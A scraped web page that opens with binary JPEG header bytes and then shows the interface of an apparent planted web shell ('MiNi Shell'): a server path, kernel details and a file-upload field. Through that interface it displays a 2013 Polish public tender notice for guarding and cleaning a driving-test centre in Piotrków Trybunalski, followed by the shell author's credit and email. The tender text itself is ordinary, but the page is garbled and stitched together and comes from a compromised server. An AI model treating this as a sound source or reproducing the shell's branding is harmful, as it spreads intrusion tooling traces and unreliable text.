JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131107/235053-N-2013.html

<p class="kh_header"><b>Piotrków Trybunalski: Ochrona obiektu WORD w Piotrkowie Trybunalskim, utrzymanie czystości wewnątrz budynku administracyjnego , zaplecza technicznego i poczekalni, utrzymanie w czystości zewnętrznych elewacji , przeszkleń wewnętrznych i zewnętrznych  budynków przy ul. Glinianej 17 w Piotrkowie Trybunalskim</b><br>
<b>Numer ogłoszenia: 235053 - 2013; data zamieszczenia: 07.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Ośrodek Ruchu Drogowego , ul. Gliniana 17, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 6466873, faks 044 6468123.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> word-piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona obiektu WORD w Piotrkowie Trybunalskim, utrzymanie czystości wewnątrz budynku administracyjnego , zaplecza technicznego i poczekalni, utrzymanie w czystości zewnętrznych elewacji , przeszkleń wewnętrznych i zewnętrznych  budynków przy ul. Glinianej 17 w Piotrkowie Trybunalskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1	Ochronie podlega obiekt z wyposażeniem w okresie trzech lat od podpisania umowy.
2.2	Wykonanie usługi w zakresie ochrony obiektu poprzez:
-	fizyczną ochronę obiektu przez strażnika łącznie z jego wyposażeniem 
/ bez broni/ - minimum czterech pracowników ochrony,
-	ochrona obiektu odbywać się będzie całodobowo,
2.3	Do obowiązków ochrony należeć będzie:
- zapewnienie bezpieczeństwa pracownikom i petentom wraz z ochroną mienia budynku,


- sprawdzenie prawidłowości zamknięć i zabezpieczeń budynków po godzinach
   urzędowania,
- sprawdzenie prawidłowości zamknięć i zabezpieczeń: pokoi biurowych, okien oraz 
   wyłączenia oświetlenia i odbiorników prądu elektrycznego mogące spowodować pożar
   po godzinach urzędowania,
- systematyczne dokonywanie obchodów w budynku oraz na posesji w celu wykrycia
   ewentualnych faktów wskazujących na możliwość zagrożenia mienia kradzieżą, 
   włamaniem, zniszczeniem lub pożarem itp.,
- przestrzeganie porządku publicznego w budynku oraz na posesji,
- codzienne informowanie o spostrzeżeniach i uwagach dotyczących pełnionej służby oraz
   prowadzenie książki przebiegu służby, a w wypadkach szczególnych dotyczących
   bezpieczeństwa, zagrożenia itp. Natychmiastowe informowanie odpowiednich służb
   oraz przedstawiciela zamawiającego,
- ochrona w sytuacjach szczególnego zagrożenia życia i zdrowia osób przebywających na
   terenie obiektu i posesji. Za sytuacje szczególnego zagrożenia uznaje się w 
    szczególności:

a) rabunek w obiekcie chronionym,
b) wybuch lub zagrożenie wybuchem w obiekcie chronionym,
c) terroryzm,
d) pożar w miejscu chronionego obiektu i inne zdarzenie losowe,
e) kradzież z włamaniem,
f) niewłaściwe zachowanie osoby w stosunku do pracowników WORD lub innych osób.

- do dodatkowych obowiązków ochrony należy:
   a) codzienne usuwanie nieczystości z chodników , parkingów i  dróg wokół 
        budynków  WORD,
   b) podlewanie trawników w okresie letnim,
   c) usuwanie śniegu oraz oblodzenia z chodników przed budynkami WORD w 
        miarę  potrzeb,
   d) codzienne opróżnianie koszy na śmieci ustawionych wokół budynków i na placu
        manewrowym WORD,
    e) bieżące utrzymanie czystości w pomieszczeniu portierni,
    f) sprzęt oraz materiały niezbędne do wykonania wyżej wymienionych zadań
         zabezpiecza  Zamawiający.

2.4 Zamawiający nie dopuszcza udziału podwykonawców.

2.5 Pracownicy ochrony powinni nosić umundurowanie firmowe umożliwiające identyfikację podmiotu wykonującego ochronę oraz posiadać w widocznym miejscu jednolite identyfikatory umożliwiające identyfikację pracownika. Wykonawca we własnym zakresie wyposaża swoich pracowników w sprzęt niezbędny do wykonywania powierzonych im zadań w tym umundurowanie i bezprzewodowe środki łączności oraz grupę interwencyjną.

2.6	Wykonawca ponosi odpowiedzialność za wszelkie szkody spowodowane nieprawidłowym wykonywaniem obowiązków przez pracowników ochrony, a także odpowiedzialność cywilną za wszelkie zdarzenia będące skutkiem wykonywanych zadań.

2.7 Obiekt WORD jest wyposażony w system monitoringu.

2.8 Szczegółowe zasady ochrony obiektu z wyposażeniem oraz zasady sprzątania
      zawierały będą opracowane przez   Wykonawcę regulaminy uzgodnione i podpisane 
      przez zamawiającego i Wykonawcę.. 

Wykonawca przedstawi Zamawiającemu w/w regulaminy w terminie dwóch dni 
                                     przed     podpisaniem umowy. 


2.9. Utrzymanie czystości na terenie obiektu WORD.

  1. Wymagana liczba osób do sprzątania -  minimum trzy  osoby  
  2. Budynek administracyjno-socjalny dwukondygnacyjny powierzchnia użytkowa 1112   m2,
  3. Budynek zaplecza technicznego jednokondygnacyjny o powierzchni użytkowej 495 m2,
  4. Poczekalnia zewnętrzna  o powierzchni użytkowej  30  m2,
  5. Mycie okien zewnętrznych i przeszkleń w budynkach oraz mycie wykonanych z blachy
      zewnętrznych elewacji budynków należy  przyjąć, że odbywać się będzie dwa razy 
      w roku / wiosna i jesień/,
  6. Dwukrotne w ciągu roku pranie wykładzin dywanowych w pomieszczeniach WORD,
  7. Dwukrotne w ciągu roku pranie siedzisk ustawionych w poczekalni oraz na
       korytarzach  w parterowej części budynku administracyjnego,
  8. Mycie okien i przeszkleń wewnątrz budynków na bieżąco według potrzeb,
  9. W kosztach należy uwzględnić zaopatrzenie ośrodka w papier ręcznikowy, toaletowy, 
       mydło w płynie i inne środki do sanitariatów,
       a) papier toaletowy dwuwarstwowy biały gramatura minimum 2x19 g/ m2,

       b) papier ręcznikowy listkowy dwuwarstwowy biały o gramaturze minimum 
            2x19 g/ m2
   
  10.  Koszty zakupu środków do mycia i czyszczenia i prania ponosi Wykonawca
  11.  Czynności związane z utrzymaniem czystości Wykonawca będzie realizował 
          z wykorzystaniem własnych środków i sprzętu, z zastrzeżeniem pkt 2.3 w zakresie 
          dodatkowych obowiązków ochrony. 
   12.  Przeciętne zatrudnienie w WORD wynosi 40osób,
   13.  Dzienna przeciętna rotacja interesantów wynosi 180 osób,
   14.  Do wykonania całego zamówienia Wykonawca zabezpiecza własną obsadę kadrową 
          w ilości osób zapewniającej należyte wykonywanie zamówienia.
Zamawiający dopuszcza udział podwykonawców w realizacji utrzymania czystości wymienionych w punkcie 2.9 ustęp 5, 6 i 7.

  W przypadku uwag co do prawidłowego wykonywania prac związanych z dozorem lub sprzątaniem obiektu WORD na wniosek Zamawiającego Wykonawca zobowiązany jest 
zwiększyć obsadę kadrową..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>możliwość przedłużenia terminu wykonania zamówienia:
- w przypadku wystąpienia siły wyższej  oraz innych okoliczności niezależnych od 
Wykonawcy uniemożliwiających realizację przedmiotu umowy,
- w przypadku wystąpienia zamówień dodatkowych zgodnie z art.67. ust. 1. pkt. 6. Ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 74.61.30.00-9, 74.70.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE WADIUM.
                  
          Wysokość wadium ustala się na kwotę 10.000,00 złotych
         Słownie: dziesięć tysięcy złotych

8.1  Wadium należy wnieść przed upływem terminu składania ofert tj. do dnia 21.11.2013 r.
       do godz. - 1000  w formie określonej w art. 45 ust. 6 Ustawy.




  8.2  Za skuteczny termin wniesienia wadium w formie pieniężnej będzie uważany termin
          uznania rachunku Zamawiającego w dniu  21.11.2013 r. do godz. - 1000 .
    Konto Zamawiającego PKO BP S.A O/Piotrków Tryb., Numer konta: 
          7110 2039 1600000 402 01080118. z dopiskiem na blankiecie przelewu: wadium 
           na zabezpieczenie oferty przetargowej zadania:  

   Ochrona obiektu WORD w Piotrkowie Trybunalskim, utrzymanie czystości wewnątrz budynku administracyjnego, zaplecza technicznego i poczekalni utrzymanie w czystości zewnętrznych elewacji, przeszkleń wewnętrznych i zewnętrznych  budynków przy ul. Glinianej 17 w Piotrkowie Trybunalskim. Oznaczonego znakiem ZP-371/4/2013 
 
Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy
                                                        dołączyć do oferty. 


8.3	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną
formą wadium w wyznaczonym terminie zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.

     8.4 Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze
           oferty najkorzystniejszej, z wyjątkiem wykonawcy, którego oferta została wybrana, 
           jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.
     
8.4	Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po
       unieważnieniu  postępowania o udzielenie niniejszego zamówienia publicznego, pod 
       warunkiem, iż  protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich
       wnoszenia.

W przypadku wadium wniesionego w formie pieniężnej w celu jego  sprawnego zwrotu do oferty prosimy zamieścić informację o numerze konta bankowego na które ma być zwrócone wadium.

8.5	 Zwrot lub utrata wadium nastąpi na podstawie art. 46 Ustawy .</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Koncesję udzieloną przez Ministra spraw wewnętrznych i administracji na  
          prowadzenie działalności gospodarczej polegającej na ochronie osób i mienia 
          zgodnie z Ustawą z dnia 22. 08.1997r o Ochronie osób i mienia (Dz. U. z 1997r.
          nr 114 poz. 740 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)   wykażą i udokumentują (referencjami, opiniami lub listami polecającymi), iż w okresie ostatnich 3 lat przed wszczęciem postępowania (tj. w okresie 2.10.2010 - 31.10.2013), a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności wykonali usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, przez co należy rozumieć wykonanie min. jednej usługi ochrony i sprzątania obejmującej obiekt  o wartości min. 100.000,00 zł netto każda,
b)   wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawo korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia 
            b)   osoby, które będą uczestniczyć w wykonywaniu zamówienia , osoby 
                   odpowiedzialne za świadczenie usług posiadają kwalifikacje zawodowe, 
                   doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także
                   zakresu wykonywanych przez nich czynności, oraz informację o podstawie do
                  dysponowania tymi osobami,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-   posiadają ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - procentowy wskaźnik PFRON - 15</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.1  Postanowienia umowy określono w załączniku nr 2 do SIWZ
       
16.2  Zgodnie z art. 144 ust 1 Ustawy  zamawiający przewiduje możliwość zmiany        
        postanowień zawartej umowy w stosunku do treści oferty, na podstawie której 
        dokonano wyboru wykonawcy na niżej określonych warunkach:
         a) możliwość przedłużenia terminu wykonania zamówienia:
             - w przypadku wystąpienia siły wyższej  oraz innych okoliczności niezależnych od 
               Wykonawcy uniemożliwiających realizację przedmiotu umowy,
             - w przypadku wystąpienia zamówień dodatkowych zgodnie z art.67. ust. 1.
                      pkt. 6. Ustawy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.word-piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Ośrodek Ruchu Drogowego
ul. Gliniana 17
97-300 Piotrków Trybunalski
SEKRETARIAT.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2013 godzina 10:00, miejsce: Wojewódzki Ośrodek Ruchu Drogowego
ul. Gliniana 17
97-300 Piotrków Trybunalski
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com